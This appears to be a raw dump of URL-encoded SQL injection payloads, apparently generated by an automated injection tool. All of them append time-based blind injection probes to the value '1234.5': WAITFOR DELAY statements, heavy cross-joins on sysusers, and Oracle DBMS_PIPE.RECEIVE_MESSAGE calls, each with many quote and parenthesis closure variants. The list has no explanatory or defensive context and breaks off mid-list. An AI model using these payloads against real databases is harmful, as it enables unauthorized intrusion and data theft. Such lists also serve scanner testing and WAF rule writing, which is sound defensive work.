1234.5%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%288775%3D8775 1234.5%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%288854%3D8854 1234.5%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%282430%3D2430 1234.5%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%27Drgd%27%3D%27Drgd 1234.5%27%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%27bJdB%27%3D%27bJdB 1234.5%27%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%28%27otvm%27%3D%27otvm 1234.5%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%27BnGq%27%3D%27BnGq 1234.5%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%27kZFe%27%20LIKE%20%27kZFe 1234.5%27%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%27PgMQ%27%20LIKE%20%27PgMQ 1234.5%27%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%28%27dcLY%27%20LIKE%20%27dcLY 1234.5%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%27RDFX%27%20LIKE%20%27RDFX 1234.5%22%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%22LAXT%22%3D%22LAXT 1234.5%22%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%22dKjF%22%3D%22dKjF 1234.5%22%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%28%22RWRj%22%3D%22RWRj 1234.5%22%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%22IauI%22%3D%22IauI 1234.5%22%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%22EWzL%22%20LIKE%20%22EWzL 1234.5%22%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%22MuBK%22%20LIKE%20%22MuBK 1234.5%22%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%28%22zLvT%22%20LIKE%20%22zLvT 1234.5%22%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%22kJMS%22%20LIKE%20%22kJMS 1234.5%29%20WHERE%209021%3D9021%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%29%20WHERE%209753%3D9753%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%20WHERE%205751%3D5751%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%20WHERE%201398%3D1398%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%20%7C%7C%20%28SELECT%204525%20FROM%20DUAL%20WHERE%207108%3D7108%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204733%20WHERE%207458%3D7458%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%203478%20FROM%20DUAL%20WHERE%209596%3D9596%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20%29 1234.5%20%2B%20%28SELECT%203741%20WHERE%202622%3D2622%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20%29 1234.5%27%20%2B%20%28SELECT%20%27mPWV%27%20FROM%20DUAL%20WHERE%205003%3D5003%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27TyJl%27%20WHERE%209069%3D9069%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20%23 1234.5%29%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1234.5%27%29%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1234.5%27%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1234.5%22%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1234.5%29%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%289044%3D9044 1234.5%29%29%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%281848%3D1848 1234.5%29%29%29%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%287440%3D7440 1234.5%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1234.5%27%29%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27VmnX%27%3D%27VmnX 1234.5%27%29%29%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27vCML%27%3D%27vCML 1234.5%27%29%29%29%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27WKdU%27%3D%27WKdU 1234.5%27%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27bIZL%27%3D%27bIZL 1234.5%27%29%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27tPKx%27%20LIKE%20%27tPKx 1234.5%27%29%29%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27aiWo%27%20LIKE%20%27aiWo 1234.5%27%29%29%29%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27tlgl%27%20LIKE%20%27tlgl 1234.5%27%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27weOj%27%20LIKE%20%27weOj 1234.5%22%29%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%22rXVc%22%3D%22rXVc 1234.5%22%29%29%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%22hBXY%22%3D%22hBXY 1234.5%22%29%29%29%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%22FIFp%22%3D%22FIFp 1234.5%22%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22ohay%22%3D%22ohay 1234.5%22%29%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%22OgXK%22%20LIKE%20%22OgXK 1234.5%22%29%29%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%22KIvR%22%20LIKE%20%22KIvR 1234.5%22%29%29%29%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%22cqsD%22%20LIKE%20%22cqsD 1234.5%22%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22QGHz%22%20LIKE%20%22QGHz 1234.5%29%20WHERE%208759%3D8759%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1234.5%27%29%20WHERE%208606%3D8606%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1234.5%27%20WHERE%204468%3D4468%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1234.5%22%20WHERE%207533%3D7533%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1234.5%27%20%7C%7C%20%28SELECT%204140%20FROM%20DUAL%20WHERE%202255%3D2255%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209388%20WHERE%201773%3D1773%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%205765%20FROM%20DUAL%20WHERE%204051%3D4051%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29 1234.5%20%2B%20%28SELECT%203768%20WHERE%207188%3D7188%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27tPyr%27%20FROM%20DUAL%20WHERE%208736%3D8736%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27nCzK%27%20WHERE%209835%3D9835%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%203356%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%23 1234.5%29%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%27%29%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%27%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%22%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%29%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%282490%3D2490 1234.5%29%29%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%288057%3D8057 1234.5%29%29%29%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%286518%3D6518 1234.5%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%27%29%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%27KquK%27%3D%27KquK 1234.5%27%29%29%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%27RneK%27%3D%27RneK 1234.5%27%29%29%29%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%28%27AFRu%27%3D%27AFRu 1234.5%27%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%27RCBC%27%3D%27RCBC 1234.5%27%29%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%27VlOd%27%20LIKE%20%27VlOd 1234.5%27%29%29%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%27VxKV%27%20LIKE%20%27VxKV 1234.5%27%29%29%29%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%28%27Szpb%27%20LIKE%20%27Szpb 1234.5%27%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%27FzJS%27%20LIKE%20%27FzJS 1234.5%22%29%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%22ZlAw%22%3D%22ZlAw 1234.5%22%29%29%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%22yxJP%22%3D%22yxJP 1234.5%22%29%29%29%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%28%22ZpSI%22%3D%22ZpSI 1234.5%22%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%22otRA%22%3D%22otRA 1234.5%22%29%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%22COAP%22%20LIKE%20%22COAP 1234.5%22%29%29%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%22khHZ%22%20LIKE%20%22khHZ 1234.5%22%29%29%29%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%28%22IAeA%22%20LIKE%20%22IAeA 1234.5%22%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%22USVI%22%20LIKE%20%22USVI 1234.5%29%20WHERE%208448%3D8448%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%27%29%20WHERE%207348%3D7348%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%27%20WHERE%203929%3D3929%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%22%20WHERE%208735%3D8735%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%27%20%7C%7C%20%28SELECT%201217%20FROM%20DUAL%20WHERE%203223%3D3223%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209727%20WHERE%209201%3D9201%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%204982%20FROM%20DUAL%20WHERE%201289%3D1289%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20%29 1234.5%20%2B%20%28SELECT%206154%20WHERE%202005%3D2005%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20%29 1234.5%27%20%2B%20%28SELECT%20%27vHsO%27%20FROM%20DUAL%20WHERE%206614%3D6614%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27ZraE%27%20WHERE%209903%3D9903%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%204219%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20%23 1234.5%29%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29 1234.5%27%29%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29 